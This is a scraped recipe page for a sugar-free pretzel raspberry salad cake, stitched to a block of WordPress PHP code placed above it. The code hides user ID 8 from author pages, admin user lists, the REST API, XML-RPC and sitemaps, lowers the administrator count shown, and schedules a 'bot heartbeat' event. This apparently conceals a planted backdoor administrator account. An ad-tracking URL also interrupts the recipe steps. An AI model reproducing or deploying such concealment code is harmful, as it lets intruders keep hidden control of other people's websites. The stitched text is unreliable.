add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 8;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 8 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 8 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 8;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 8;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 8;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/8(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 8;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
Pretzel Raspberry Salad Cake - Recipes
Skip to content

Not only is this just 2 weight watchers points per serving but it is scrumptious -the entire recipe makes 12 servings!
Ingredients :
- 100 grams Pretzel sticks
- 1/3 Cup I Can’t Believe It’s Not Butter The Light One melted
- 2 TBSP Monk fruit sweetener
- 1 1/2 Cups Nonfat Greek yogurt
- 8 TBSP Fat-free Cool Whip
- 1/4 tsp Vanilla bean paste or extract
- 1 Package Simply Delish sugar-free vanilla pudding mix
- 1 Package Simply Delish sugar-free raspberry jel mix
- 1/3 Cup Cold water
- 1 1/3 Cup Boiling water
- 12 Ounces Fresh raspberries
Instruction :
https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5308876240501368&output=html&h=345&slotname=6262472666&adk=4210668642&adf=1823627427&pi=t.ma~as.6262472666&w=414&lmt=1697739820&rafmt=1&format=414×345&url=https%3A%2F%2Fketosisguide.us%2Fpretzel-raspberry-salad-cake-1008abr%2F%3Ffbclid%3DIwAR3QAHNQYYXAxTYdYPR58X2VE7p8kKPQ9NLfP2jH2a1qCwEjwqBAUoXhWNc_aem_AW29CaMelYsfUeWRSJLtqn2y1o9poDhgzTNniZ3juufA9r7IqeQiNt4YE2qqjqqHlrg&fwr=1&fwrattr=true&rpe=1&resp_fmts=3&sfro=1&wgl=1&dt=1697739820200&bpp=2&bdt=1290&idt=311&shv=r20231011&mjsv=m202310160101&ptt=9&saldr=aa&abxe=1&prev_fmts=0x0%2C414x345%2C414x345&nras=1&correlator=5882161427558&frm=20&pv=1&ga_vid=1803328607.1697739820&ga_sid=1697739820&ga_hid=1779500172&ga_fc=1&u_tz=240&u_his=1&u_h=896&u_w=414&u_ah=896&u_aw=414&u_cd=24&u_sd=2&adx=0&ady=2121&biw=414&bih=706&scr_x=0&scr_y=0&eid=44759927%2C44759876%2C44798934%2C44804684%2C44805112%2C44805534%2C44805681%2C44805934%2C31078297&oid=2&pvsid=1914005977497116&tmod=590601447&uas=3&nvt=1&ref=http%3A%2F%2Fm.facebook.com%2F&fc=1920&brdim=0%2C0%2C0%2C0%2C414%2C0%2C414%2C706%2C414%2C706&vis=1&rsz=%7C%7CoeEbr%7C&abl=CS&pfx=0&cms=2&fu=128&bc=31&ifi=4&uci=a!4&btvi=2&fsb=1&xpc=YL3Wt9HqtP&p=https%3A//ketosisguide.us&dtd=313
- Preheat the oven to 350 degrees.
- Melt the butter and set aside.
- Place the pretzels into a Ziploc bag and break them into small pieces.
- In a bowl combine the pretzels, melted butter and monk fruit sweetener. Mix until combine.
- Place the pretzel mixture into a greased oven-safe dish (I used a 9×7 one) and press with your fingers firmly to molt the crust.
- Bake for 12 minutes and let cool.
- While the pretzel crust is in the oven, In a bowl put the nonfat Greek yogurt, vanilla, cool whip and sugar-free pudding mix. Mix until combine.
- Put the yogurt mixture over the pretzel crust and smooth out.
- In a separate bowl add the jello, cold water to dissolve then add the boiling water. Mix until combined.
- Add the fresh raspberries then mash up.
- Pour jello mix over the yogurt mixture and place the entire dish into the fridge for a few hours to solidify.